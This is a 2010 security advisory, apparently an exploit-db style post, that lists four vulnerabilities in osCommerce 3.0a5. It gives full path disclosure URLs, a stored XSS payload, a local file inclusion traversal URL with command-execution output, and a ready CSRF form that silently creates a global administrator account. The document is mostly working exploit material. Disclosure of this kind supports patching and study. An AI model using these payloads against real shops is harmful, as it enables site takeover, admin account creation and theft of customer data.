osCommerce v3.0a5 [ Multiple Vulnerabilities ]

[+] [SOFTWARE] :: osCommerce

[+] [SOFTWARE SITE] :: www.oscommerce.com

[+] [VERSION] :: 3.0a5 (but possible all versions)

[+] [DATE] :: 30 April 2010

[+] [AUTHOR] :: Alberto Fontanella (Fulgur Security)

 

[ 1 ] - [ Full Path Disclosure ]

http://[host]/templates/default/content/index/product_listing.php

http://[host]/templates/default/content/info/info_contact.php

...etc Output: Fatal error: Call to undefined function osc_image() in /var/www/templates/default/content/index/product_listing.php on line 16

http://[host]/includes/classes/search.php

...etc Output: Warning:

require(includes/classes/products.php) [function.require]: failed to open stream: No such file or directory in /var/www/includes/classes/search.php on line 15
Fatal error: require() [function.require]: Failed opening required 'includes/classes/products.php' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/includes/classes/search.php on line 15
 

[ 2 ] - [ Persistent XSS ]

http://[host]/products.php?oscommerce-tshirt

Put in Front field: <script>alert("XSS")</script>

Click "Add to Cart" Checkout section calls stored XSS.  

[ 3 ] - [ Local File Inclusion ]

http://[host]/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd

...etc You have to put cmd.php in /

Output:

uid=33(www-data) gid=33(www-data) groups=33(www-data) Linux ubuntu 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686 GNU/Linux  

[ 4 ] - [ XSRF ]

To create a new Administrator with Global Privileges:

<html>

<body>

<form action="http://[host]/admin/index.php?administrators&action=save" method="post"> <input type="text" name="user_name" value="haxor">

<input type="text" name="user_password" value="hax0r">

<input type="text" name="modules[]" value="0">

<input type="hidden" name="subaction" value="confirm"/>

<input type="submit" value="Save">

</form> </body> </html>

...etc  

[ EOF ]